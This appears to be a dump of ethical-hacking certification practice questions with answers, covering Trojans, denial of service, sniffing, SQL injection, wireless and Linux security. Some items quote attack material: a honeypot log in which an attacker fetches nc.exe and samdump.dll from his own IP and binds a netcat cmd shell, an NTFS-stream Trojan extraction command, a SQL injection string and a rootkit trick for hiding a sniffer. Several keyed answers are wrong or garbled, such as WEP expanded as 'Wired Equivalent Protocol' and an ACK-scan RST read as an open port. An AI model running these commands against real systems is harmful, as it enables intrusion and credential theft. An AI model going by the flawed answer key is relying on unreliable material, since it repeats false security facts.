C. %windir%\\system32\\drivers\\etc\\services
One of your junior administrator is concerned with Windows LM hashes and password cracking. Inyour discussion with them, which of the following are true statements that you would point out?Select the best answers.A. John the Ripper can be used to crack a variety of passwords, but one limitation is that theoutput doesn't show if the password is upper or lower case.B. BY using NTLMV1, you have implemented an effective countermeasure to password cracking.C. SYSKEY is an effective countermeasure.D. If a Windows LM password is 7 characters or less, the hash will be passed with the followingcharacters, in HEX- 00112233445566778899.E. Enforcing Windows complex passwords is an effective countermeasure.
A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show whether the password is upper or lower case. C. SYSKEY is an effective countermeasureE. Enforcing Windows' complex passwords is an effective countermeasure.
In the following example, which of these is the "exploit"? Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had beenautomated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites. Select the best answer.
E. The documented method of how to use the vulnerability to gain unprivileged access.
Assuring two systems that are using IPSec to protect traffic over the internet, what type of generalattack could compromise the data?A. Spoof AttackB. Smurf AttackC. Man in the Middle AttackD. Trojan Horse AttackE. Back Orifice Attack
D. Trojan Horse AttackE. Back Orifice Attack
What is a Trojan Horse?A. A malicious program that captures your username and passwordB. Malicious code masquerading as or replacing legitimate codeC. An unauthorized user who gains access to your user database and adds themselves as a userD. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hackingactivity
B. Malicious code masquerading as, or replacing, legitimate code.
You want to use netcat to generate huge amount of useless network data continuously for variousperformance testing between 2 hosts. Which of the following commands accomplish this?A. Machine A #yes AAAAAAAAAAAAAAAAAAAAAA |nc -v -v -l -p 2222 > /dev/null Machine B#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/nullB. Machine A cat somefile |nc -v -v -l -p 2222 Machine B cat somefile | nc othermachine 2222C. Machine Anc -l -p 1234 | uncompress -c | tar xvfp Machine B tar cfp - /some/dir | compress -c |nc -w 3 machinea 1234D. Machine A while true : do nc -v -l -s -p 6000 machineb 2 Machine B while true ; do nc -v -l -s -p6000 machinea 2 done
A. Machine A #yes AAAAAAAAAAAAAAAAAAAAAA |nc -v -v -l -p 2222 > /dev/null Machine B#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
Which of the following statements would not be a proper definition for a Trojan Horse?A. An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.B. A legitimate program that has been altered by the placement of unauthorized code within it; this code perform functions unknown (and probably unwanted) by the user.C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed.D. Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed.
You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming.Which command would you execute to extract the Trojan to a standalone file?A. c:\> type readme.txt:virus.exe > virus.exeB. c:\> more readme.txt | virus.exe > virus.exeC. c:\> cat readme.txt:virus.exe > virus.exeD. c:\> list redme.txt$virus.exe > virus.exe
C. c:\> cat readme. txt : virus. exe > virus.exe
You suspect that your Windows machine has been compromised with a Trojan virus. When yourun anti-virus software it does not pick of the Trojan. Next you run netstat command to look foropen ports and you notice a strange port 6666 open. What is the next step you would do?A. Re-install the operating system.B. Re-run anti-virus software.C. Install and run Trojan removal software.D. Run utility fport and look for the application executable that listens on port 6666.
D. Run utility fport and look for the application executable that listens on port 6666.
In Linux, the three most common commands that hackers usually attempt to Trojan are:A. car, xterm, grepB. netstat, ps, topC. vmware, sed, lessD. xterm, ps,nc
B. netstat. ps, top
Jason's Web server was attacked by a trojan virus. He runs protocol analyzer and notices that theTrojan communicates to a remote server on the Internet. Shown below is the standard "hexdump"representation of the network packet, before being decoded. Jason wants to identify the trojan bylooking at the destination port number and mapping to a trojan-port number database on theInternet. Identify the remote server's port number by decoding the packet?A. Port 1890 (Net-Devil Trojan)B. Port 1786 (Net-Devil Trojan)C. Port 1909 (Net-Devil Trojan)D. Port 6667 (Net-Devil Trojan)
D. Port 6667 (Net-Devil Trojan)
Which of the following Netcat commands would be used to perform a UDP scan of the lower 1024ports?A. Netcat -h -UB. Netcat -hUC. Netcat -sU -p 1-1024D. Netcat -u -v -w2 1-1024E. Netcat -sS -O target/1024
D. Netcat -u -v -w2 1-1024
Sniffing is considered an active attack.A. TrueB. False
B. False
Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally. He enters the following at the command prompt. $ nc -l -p 1026 -u -v In response, he sees the followingmessage. cell(?(c)???? STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found 47 Critical Errors. To fix the errors please do the following: 1.Download Registry Repair from: www.reg-patch.com 2.Install Registry Repair 3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION! What would you infer from this alert?A. The machine is redirecting traffic to www.reg-patch.com using adwareB. It is a genuine fault of windows registry and the registry needs to be backed upC. An attacker has compromised the machine and backdoored ports 1026 and 1027D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities
D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026to 1029 and the message usually promotes malware disguised as legitimate utilities
A remote user tries to login to a secure network using Telnet, but accidently types in an invaliduser name or password. Which responses would NOT be preferred by an experienced SecurityManager? (multiple answer)A. Invalid UsernameB. Invalid PasswordC. Authentication FailureD. Login Attempt FailedE. Access Denied
A. Invalid UsernameB. Invalid Password.
A POP3 client contacts the POP3 server:A. To send mailB. To receive mailC. to send and receive mailD. to get the address to send mail toE. initiate a UDP SMTP connection to read mail
B. To receive mail
Samantha was hired to perform an internal security test of pass4sure. She quickly realized that all networks are making use of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Which of the following techniques can she use to gather information from the switched network or to disable some of the traffic isolation features of the switch? (Choose two)A. Ethernet ZappingB. MAC FloodingC. Sniffing in promiscuous modeD. ARP Spoofing
B. MAC floodingD. ARP spoofing
Ethereal works best on ____________.A. Switched networksB. Linux platformsC. Networks using hubsD. Windows platformsE. LAN's
C. Networks using hubs
The follows is an email header. What address is that of the true originator of the message?Return-Path:Received: from smtp.com (fw.emumail.com [215.52.220.122]. by raq-221-181.ev1.net(8.10.2/8.10.2. with ESMTP id h78NIn404807 for ; Sat, 9 Aug 2003 18:18:50 -0500 Received:(qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 Received: from ([19.25.19.10]. bysmtp.com with SMTP Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. bylocalhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: "Bill Gates" To: "mikeg"Subject: We need your help! Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID:<51.32.123.21@CHRISLAPTOP> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal. X-MSMail-Priority: NormalXMailer:Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLEV6.00.2800.1165 Importance: NormalA. 19.25.19.10B. 51.32.123.21C. 168.150.84.123D. 215.52.220.122E. 8.10.2/8.10.2
C. 168.150.84.123
Which one of the following instigates a SYN flood attack?A. Generating excessive broadcast packets.B. Creating a high number of half-open connections.C. Inserting repetitive Internet Relay Chat (IRC) messages.D. A large number of Internet Control Message Protocol (ICMP) traces.
B. Creating a high number of half-open connections.
Global deployment of RFC 2827 would help mitigate what classification of attack?A. Sniffing attackB. Denial of service attackC. Spoofing attackD. Reconnaissance attackE. Prot Scan attack
C. Spoofing attack
What happens when one experiences a ping of death?A. This is when an IP datagram is received with the "protocol" field in the IP header set to 1(ICMP) and the "type" field in the ICMP header is set to 18 (Address Mask Reply).B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1(ICMP), the Last Fragment bit is set, and (IP offset ' 8) + (IP data length) >65535. In other words,the IP offset (which represents the starting position of this fragment in the original packet, andwhich is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IPpacket.C. This is when an IP datagram is received with the "protocol" field in the IP header set to 1(ICMP) and the source equal to destination address.D. This is whenan the IP header is set to 1 (ICMP) and the "type" field in the ICMP header is set to5 (Redirect).
B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP), the Last Fragment bit is set, and (IP offset '8) + (IP data length) >65535. In other words, the IP offset (which represents the starting position of this fragment in the original packet, and in which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet.
Which one of the following network attacks takes advantages of weaknesses in the fragmentreassembly functionality of the TCP/IP protocol stack?A. TeardropB. SmurfC. Ping of DeathD. SYN floodE. SNMP Attack
A. Teardrop
A denial of Service (DoS) attack works on the following principle:A. MS-DOS and PC-DOS operating system utilize a weaknesses that can be compromised and permit them to launch an attack easily.B. All CLIENT systems have TCP/IP stack implementation weakness that can be compromised and permit them to lunch an attack easily.C. Overloaded buffer systems can easily address error conditions and respond appropriately.D. Host systems cannot respond to real traffic, if they have an overwhelming number of incomplete connections (SYN/RCVD State).E. A server stops accepting connections from certain networks one those network become flooded.
D. Host systems cannot respond to real traffic if they have an overwhelming number of incomplete connections (SYN / RCVD state)
What happens during a SYN flood attack?A. TCP connection requests flood a target machine. The target machine is flooded with randomized source address & ports for the TCP ports.B. A TCP SYN packet, which is a connection initiation, is sent to a target machine, giving thetarget host's address as both source and destination, and is using the same port on the target host as both source and destination.C. A TCP packet is received with the FIN bit set but with no ACK bit set in the flags field.D. A TCP packet is received with both the SYN and the FIN bits set in the flags field.
A. TCP connection requests flood a target machine. The target machine is flooded with randomized source address & ports for the TCP ports.
What is the term 8 to describe an attack that falsifies a broadcast ICMP echo request and includesa primary and secondary victim?A. Fraggle AttackB. Man in the Middle AttackC. Trojan Horse AttackD. Smurf AttackE. Back Orifice Attack
D. Smurf attack.
What is the goal of a Denial of Service Attack?A. Capture files from a remote computer.B. Render a network or computer incapable of providing normal service.C. Exploit a weakness in the TCP stack.D. Execute service at PS 1009.
B. Render a network or computer incapable of providing normal service.
What do you call a system where users need to remember only one username and password, andbe authenticated for multiple services? A. Simple Sign-onB. Unique Sign-onC. Single Sign-onD. Digital Certificate
C. Single Sign On.
What would best be defined as a security test on services against a known vulnerability databaseusing an automated tool?A. A penetration testB. A privacy reviewC. A server auditD. A vulnerability assessment
D. A vulnerability assessment.
A Buffer Overflow attack involves:A. Using atrojan program to direct data traffic to the target host's memory stackB. Flooding the target network buffers with data traffic to reduce the bandwidth available tolegitimate usersC. Using a dictionary to crack password buffers by guessing user names and passwordsD. Poorly written software that allows an attacker to execute arbitrary code on a target system
D. Poorly written software that allows an attacker to execute arbitrary code on a target system.
When working with Windows systems, what is the RID of the true administrator account?A. 500B. 501C. 512D. 1001E. 1024F. 1000
A. 500
If you send a SYN to an open port, what is the correct response? (Choose all correct answers.)A. SYNB. ACKC. FIND. PSH
A. SYNB. ACK
You have been called to investigate a sudden increase in network traffic at pass4sure. It seemsthat the traffic generated was too heavy that normal business functions could no longer berendered to external employees and clients. After a quick investigation, you find that the computerhas services running attached to TFN2k and Trinoo software. What do you think was the most likely cause behind this sudden increase in traffic?
A. A distributed denial of service attack.
Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. Whatshould Peter do to prevent a smurf attack? Select the best answer.A. He should disable unicast on all routersB. Disable multicast on the routerC. Turn off fragmentation on his routerD. Make sure all anti-virus protection is updated on all systemsE. Make sure his router won't take a directed broadcast
E. Make sure his router won't take a directed broadcast.
Your boss at pass4sure.com asks you what are the three stages of Reverse Social Engineering.A. Sabotage, advertising,AssistingB. Sabotage, Advertising, CoveringC. Sabotage, Assisting, BillingD. Sabotage, Advertising, Covering
A. Sabotage, Advertising, Assisting
What is the most common vehicle for social engineering attacks?A. PhoneB. EmailC. In personD. P2P Networks
A. Telephone
Usernames, passwords, e-mail addresses, and the location of CGI scripts may be obtained fromwhich of the following information sources?A. Company web siteB. Search enginesC. EDGAR Database queryD. Whois query
A. Company website
What are the six types of social engineering? (Choose six).A. SpoofingB. ReciprocationC. Social ValidationD. CommitmentE. FriendshipF. ScarcityG. AuthorityH. Accountability
B. ReciprocationC. Social ValidationD. CommitmentE. FriendshipF. ScarcityG. Authority
What does the following command achieve? Telnet HEAD /HTTP/1.0A. This command returns the home page for the IP address specifiedB. This command opens a backdoor Telnet session to the IP address specifiedC. This command returns the banner of the website specified by IP addressD. This command allows a hacker to determine the sites securityE. This command is bogus and will accomplish nothing
C. This command returns the banner of the website specified by IP address
Which type of hacker represents the highest risk to your network?A. script kiddiesB. grey hat hackersC. black hat hackersD. disgruntled employees
D. Disgruntled employees
John is using tokens for the purpose of strong authentication. He is not confident that his securityis considerably strong. In the context of Session hijacking why would you consider this as a falsesense of security?A. The token based security cannot be easily defeated.B. The connection can be taken over after authentication.C. A token is not considered strong authentication.D. Token security is not widely used in the industry.
B. The connection can be taken over after authentication.
What type of cookies can be generated while visiting different web sites on the Internet?A. Permanent and long term cookies.B. Session and permanent cookies.C. Session and external cookies.D. Cookies are all the same, there is no such thing as different type of cookies.
B. Session cookies and permanent cookies
What is Hunt used for?A. Hunt is used to footprint networksB. Hunt is used to sniff trafficC. Hunt is used to hack web serversD. Hunt is used to intercept traffic i.e. man-in-the-middle trafficE. Hunt is used for password cracking
D. Hunt is used to intercept traffic. I.e. man in the middle attacks.
Tess King is making use of Digest Authentication for her Web site. Why is this considered to bemore secure than Basic authentication?A. Basic authentication is brokenB. The password is never sent in clear text over the networkC. The password sent in clear text over the network is never reused.D. It is based on Kerberos authentication protocol
B. The password is never sent in cleartext over the network.
You wish to determine the operating system and type of web server being used. At the same timeyou wish to arouse no suspicion within the target organization. While some of the methods listedbelow work, which holds the least risk of detection?A. Make some phone calls and attempt to retrieve the information using social engineering.B. Use nmap in paranoid mode and scan the web server.C. Telnet to the web server and issue commands to illicit a response.D. Use the netcraft web site look for the target organization's web site.
D. Use the netcraft website to look for the target organization's web site.
Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choosethree)A. Internet Printing Protocol (IPP) buffer overflowB. Code Red WormC. Indexing services ISAPI extension buffer overflowD. NeXT buffer overflow
A. Internet Printing Protocol (IPP) buffer overflowB. Code Red WormC. Indexing services ISAPI extension buffer overflow.
On a default installation of Microsoft IIS web server, under which privilege does the web serversoftware execute?A. EveryoneB. GuestC. SystemD. Administrator
C. System
What are the three phases involved in security testing?A. Reconnaissance, Conduct, ReportB. Reconnaissance, Scanning, ConclusionC. Preparation, Conduct, ConclusionD. Preparation, Conduct, Billing
C. Preparation, Conduct, Conclusion
You visit a website to retrieve the listing of a company's staff members. But you can not find it onthe website. You know the listing was certainly present one year before. How can you retrieveinformation from the outdated website?A. Through Google searching cached filesB. Through Archive.orgC. Download the website and crawl itD. Visit customers' and prtners' websites
B. Through Archive.org
This kind of attack will let you assume a users identity at a dynamically generated web page orsite:A. SQL InjectionB. Cross Site ScriptingC. Session HijackingD. Zone Transfer
B. Cross Site Scripting
____________ will let you assume a users identity at a dynamically generated web page or site.A. SQL attackB. Injection attackC. Cross site scriptingD. The shell attackE. Winzapper
C. Cross Site Scripting
What is Form Scalpel used for?A. Dissecting HTML FormsB. Dissecting SQL FormsC. Analysis of Access Database FormsD. Troubleshooting Netscape NavigatorE. Quatro Pro Analysis Tool
A. Dissecting HTML forms
Bubba has just accessed he preferred ecommerce web site and has spotted an item that he wouldlike to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpageand decides to save the page locally, so that he can modify the page variables. In the context ofweb application security, what do you think Bubba has changes?A. A hidden form field value.B. A hidden price value.C. An integer variable.D. A page cannot be changed locally, as it is served by a web server
A. A hidden form field value.
Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack?A. PhishingB. Denial of ServiceC. Cross Site ScriptingD. Backdoor installation
C. Cross Site Scripting
You have just received an assignment for an assessment at a company site. Company'smanagement is concerned about external threat and wants to take appropriate steps to insuresecurity is in place. Anyway the management is also worried about possible threats coming frominside the site, specifically from employees belonging to different Departments. What kind ofassessment will you be performing?A. Black box testingB. Black hat testingC. Gray box testingD. Gray hat testingE. White box testingF. White hat testing
C. Gray box testing
What does black box testing mean?A. You have full knowledge of the environmentB. You have no knowledge of the environmentC. You have partial knowledge of the environment
B. You have no knowledge of the environment.
Say that "abigcompany.com" had a security vulnerability in the javascript on their website in thepast. They recently fixed the security vulnerability, but it had been there for many months. Is theresome way to 4go back and see the code for that error? Select the best answer.A. archive.orgB. There is no way to get the changed webpage unless you contact someone at the companyC. UsenetD. Javascript would not be in their html so a service like usenet or archive wouldn't help you
A. archive.org
Which of the following is the best way an attacker can passively learn about technologies used inan organization?A. By sending web bugs to key personnelB. By webcrawling the organization web siteC. By searching regional newspapers and job databases for skill sets technology hires need topossess in the organizationD. By performing a port scan on the organization's web site
C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization.
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snortreported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right torun scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. Hethen switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious userto construct SQL statements that will execute shell commands (such as CMD.EXE) on the IISserver. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.The attacker makes a RDS query which results in the commands run as shown below:"cmd1.exe /c open 213.116.251.162 >ftpcom""cmd1.exe /c echo johna2k >>ftpcom""cmd1.exe /c echo haxedj00 >>ftpcom""cmd1.exe /c echo get nc.exe >>ftpcom""cmd1.exe /c echo get samdump.dll >>ftpcom""cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /cftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 ecmd1.exe"What can you infer from the exploit given?A. It is a local exploit where the attacker logs in using username johna2k.B. There are two attackers on the system - johna2k and haxedj00.C. The attack is a remote exploit and the hacker downloads three files.D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
C. The attack is a remote exploit and the hacker downloads three files.
Bill is attempting a series of SQL queries in order to map out the tables within the database that heis trying to exploit. Choose the attack type from the choices given below.A. Database FingerprintingB. Database EnumerationC. SQL FingerprintingD. SQL Enumeration
A. Database fingerprinting.
Your boss Tess King is attempting to modify the parameters of a Web-based application in orderto alter the SQL statements that are parsed to retrieve data from the database. What would youcall such an attack?A. SQL Input attackB. SQL Piggybacking attackC. SQL Select attackD. SQL Injection attack
D. SQL Injection attack
When a malicious hacker identifies a target and wants to eventually compromise this target, whatwould be among the first steps that he would perform? (Choose the best answer)A. Cover his tracks by eradicating the log files and audit trails.B. Gain access to the remote computer in order to conceal the venue of attacks.C. Perform a reconnaissance of the remote target for identical of venue of attacks.D. Always begin with a scan in order to quickly identify venue of attacks.
C. Perform a reconnaissance of the remote target for identification of venue of attacks.
A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the databaseB. An attacker submits user input that executes an operating system command to compromise a target systemC. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining accessD. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database
A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database.
Look at the following SQL query.SELECT * FROM product WHERE PCategory='computers' or 1=1--'What will it return? Select the best answer.A. All computers and all 1'sB. All computersC. All computers and everything elseD. Everything except computers
C. All computers and everything else.
Sandra is conducting a penetration test for pass4sure.com. She knows that pass4sure.com isusing wireless networking for some of the offices in the building right down the street. Throughsocial engineering she discovers that they are using 802.11g. Sandra knows that 802.11g usesthe same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC,Sandra drives over to the building to map the wireless networks. However, even though sherepositions herself around the building several times, Sandra is not able to detect a single AP.What do you think is the reason behind this?A. Netstumbler does not work against 802.11g.B. You can only pick up 802.11g signals with 802.11a wireless cards.C. The access points probably have WEP enabled so they cannot be detected.D. The access points probably have disabled broadcasting of the SSID so they cannot bedetected.E. 802.11g uses OFDM while 802.11b uses DSSS so despite the same frequency and 802.11bcard cannot see an 802.11g signal.F. Sandra must be doing something wrong, as there is no reason for her to not see the signals.
A. Netstumbler does not work against 802.11g
WEP is used on 802.11 networks, what was it designed for?A. WEP is designed to provide a wireless local area network (WLAN) with a level of security andprivacy comparable to what it usually expected of a wired LAN.B. WEP is designed to provide strong encryption to a wireless local area network (WLAN) with alever of integrity and privacy adequate for sensible but unclassified information.C. WEP is designed to provide a wireless local area network (WLAN) with a level of availabilityand privacy comparable to what is usually expected of a wired LAN.D. WEOP is designed to provide a wireless local area network (WLAN) with a level of privacycomparable to what it usually expected of a wired LAN
A. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN.
RC4 is known to be a good stream generator. RC4 is used within the WEP standard on wireless LAN. WEP is known to be insecure even if we are using a stream cipher that is known to be secured. What is the most likely cause behind this?A. There are some flaws in the implementation.B. There is no key management.C. The IV range is too small.D. All of the above.E. None of the above.
D. All of the above
Which of the following is NOT a reason 802.11 WEP encryption is vulnerable?A. There is no mutual authentication between wireless clients and access pointsB. Automated tools like AirSnort are available to discover WEP keysC. The standard does not provide for centralized key managementD. The 24 bit Initialization Vector (IV) field is too small
C. The standard does not provide for centralized key management.
Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.)A. Identifies the wireless networkB. Acts as a password for network accessC. Should be left at the factory default settingD. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools
A. Identifies the wireless networkB. Acts as a password for network access
Which of the following wireless technologies can be detected by NetStumbler? (Select all thatapply)A. 802.11bB. 802.11eC. 802.11aD. 802.11gE. 802.11
A. 802.11bC. 802.11aD. 802.11g
802.11b is considered a ____________ protocol.A. ConnectionlessB. SecureC. UnsecureD. Token ring basedE. Unreliable
C. Unsecure
Access control is often implemented through the use of MAC address filtering on wireless AccessPoints. Why is this considered to be a very limited security measure?A. Vendors MAC address assignment is published on the Internet.B. The MAC address is not a real random number.C. The MAC address is broadcasted and can be captured by a sniffer.D. The MAC address is used properly only on Macintosh computers.
C. The MAC address is broadcast, and could be captured by a sniffer
In order to attack a wireless network, you put up an access point and override the signal of the realaccess point. As users send authentication data, you are able to capture it. What kind of attack isthis?A. Rouge access point attackB. Unauthorized access point attackC. War ChalkingD. WEP attack
A. Rogue Access Point Attack
Sally is a network admin for a small company. She was asked to install wireless accesspoints inthe building. In looking at the specifications for the access-points, she sees that all of them offerWEP. Which of these are true about WEP? Select the best answer.A. Stands for Wireless Encryption ProtocolB. It makes a WLAN as secure as a LANC. Stands for Wired Equivalent PrivacyD. It offers end to end security
C. Stands for Wired Equivalent Protocol
Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPSmapping software application. What is the recommended and well-known GPS mapping packagethat would interface with PrismStumbler? Select the best answer.A. GPSDriveB. GPSMapC. WinPcapD. Microsoft Mappoint
A. GPSDrive
What are the main drawbacks for anti-virus software?A. AV software is difficult to keep up to the current revisions.B. AV software can detect viruses but can take no action.C. AV software is signature driven so new exploits are not detected.D. It's relatively easy for an attacker to change the anatomy of an attack to bypass AV systemsE. AV software isn't available on all major operating systems platforms.F. AV software is very machine (hardware) dependent
C. AV software is signature driven, so new exploits are not detected.
What is the best means of prevention against viruses?A. Assign read only permission to all files on your system.B. Remove any external devices such as floppy and USB connectors.C. Install a rootkit detection tool.D. Install and update anti-virus scanner.
D. Install and update anti-virus scanner
The Slammer Worm exploits a stack-based overflow that occurs in a DLL implementing theResolution Service. Which of the following Database Server was targeted by the slammer worm?A. OracleB. MSSQLC. MySQLD. SybaseE. DB2
B. MSSQL
Which of the following is one of the key features found in a worm but not seen in a virus?A. The payload is very small, usually below 800 bytes.B. It is self replicating without need for user intervention.C. It does not have the ability to propagate on its own.D. All of them cannot be detected by virus scanners.
B. It is self-replicating, without the need for user intervention.
You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.What caused this?A. The Morris wormB. The PIF virusC. TrinooD. NimdaE. Code RedF. Ping of Death
D. Nimda
One of the better features of NetWare is the use of packet signature that includes cryptographicsignatures. The packet signature mechanism has four levels from 0 to 3. In the list below which ofthe choices represent the level that forces NetWare to sign all packets?A. 0 (zero)B. 1C. 2D. 3
D. 3
If you receive a RST packet while doing an ACK scan, it indicates that the port isopen.(True/False).A. TrueB. False
A. True
If you perform a port scan with a TCP ACK packet, what should an OPEN port return?A. RSTB. No ReplyC. SYN/ACKD. FIN
A. RST
Pandora is used to attack __________ network operating systems.A. WindowsB. UNIXC. LinuxD. NetwareE. MAC OS
D. Netware
What is the name of the software tool used to crack a single account on Netware Servers using adictionary attack?A. NPWCrackB. NWPCrackC. NovCrackD. CrackNovE. GetCrack
B. NWPCrack
Which of the following is NOT a valid NetWare access level?A. Not Logged inB. Logged inC. Console AccessD. Administrator
D. Administrator
Joe the Hacker breaks into pass4sure's Linux system and plants a wiretap program in order tosniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojanhorse in one of the network utilities. Joe is worried that network administrator might detect thewiretap program by querying the interfaces to see if they are running in promiscuous mode.Running "ifconfig -a"will produce the following: #ifconfig -a 1o0: flags=848 mtu 8232 inet 127.0.0.1netmask ff000000hme0: flags=863 mtu 1500 inet192.0.2.99 netmask ffffff00 broadcast 134.5.2.255ether 8:0:20:9c:a2:35 What can Joe do to hide the wiretap program from being detected by ifconfigcommand?A. Block output to the console whenever the user runs ifconfig command by running screencapture utiliyuB. Run the wiretap program in stealth mode from being detected by the ifconfig command.C. Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous informationbeing displayed on the console.D. You cannot disable Promiscuous mode detection on Linux systems.
C. Replace the original iconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console.
You have just installed a new Linux file server at your office. This server is going to be used byseveral individuals in the organization, and unauthorized personnel must not be able to modify anydata. What kind of program can you use to track changes to files on the server?A. Network Based IDS (NIDS)B. Personal FirewallC. System Integrity Verifier (SIV)D. Linux IP Chains
C. System Integrity Verifier (SIV)
Several of your co-workers are having a discussion over the etc/passwd file. They are at oddsover what types of encryption are used to secure Linux passwords. (Choose all that apply.A. Linux passwords can be encrypted with MD5B. Linux passwords can be encrypted with SHAC. Linux passwords can be encrypted with DESD. Linux passwords can be encrypted with BlowfishE. Linux passwords are encrypted with asymmetric algrothims
A. MD5C. DESD. Blowfish
Rebecca has noted multiple entries in her logs about users attempting to connect on ports that areeither not opened or ports that are not for public usage. How can she restrict this type of abuse bylimiting access to only specific IP addresses that are trusted by using one of the built-in LinuxOperating System tools?A. Ensure all files have at least a 755 or more restrictive permissions.B. Configure rules using ipchains.C. Configure and enable portsentry on his server.D. Install an intrusion detection system on her computer such as Snort
B. Configure rules using ipchains
John is discussing security with Jane. Jane had mentioned to John earlier that she suspects a Loadable Kernel Module has been installed on her server. She believes this is the reason that the server has been acting erratically lately. What does this mean in the context of Linux Security?A. Loadable Kernel Modules are a mechanism for adding functionality to a file system without requiring a kernel recompilation.B. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiled and the system rebooted.C. Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation.D. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation
D. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation
After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence?A. Change password of user nobodyB. Extract information from a local directoryC. Change the files Modification Access Creation timesD. Download rootkits and passwords into a new directory
C. Change the files Modification Acces Creation times
Peter is a Linux network admin. As a knowledgeable security consultant, he turns to you to look forhelp on a firewall. He wants to use Linux as his firewall and use the latest freely available versionthat is offered. What do you recommend? Select the best answer.A. IpchainsB. IptablesC. Checkpoint FW for LinuxD. Ipfwadm
B. Iptables
Exhibit Study the log given in the exhibit, Precautionary measures to prevent this attack wouldinclude writing firewall rules. Of these firewall rules, which among the following would beappropriate?A. Disallow UDP 53 in from outside to DNS serverB. Allow UDP 53 in from DNS server to outsideC. Disallow TCP 53 in form secondaries or ISP server to DNS serverD. Block all UDP traffic
B. Allow UDP 53 in from DNS server to outside.
Which one of the following attacks will pass through a network layer intrusion detection systemundetected?A. A teardrop attackB. A SYN flood attackC. A DNS spoofing attackD. A test.cgi attack
D. A test.cgi attack
What makes web application vulnerabilities so aggravating? (Choose two)A. They can be launched through an authorized port.B. A firewall will not stop them.C. They exist only on the Linux platform.D. They are detectable by most leading antivirus software.
A. They can be launched through an authorized portB. A firewall will not stop them.
Carl has successfully compromised a web server from behind a firewall by exploiting avulnerability in the web server program. He wants to proceed by installing a backdoor program.However, he is aware that not all inbound ports on the firewall are in the open state. From the listgiven below, identify the port that is most likely to be open and allowed to reach the server that Carl has just compromised.A. 53B. 110C. 25D. 69
A. 53
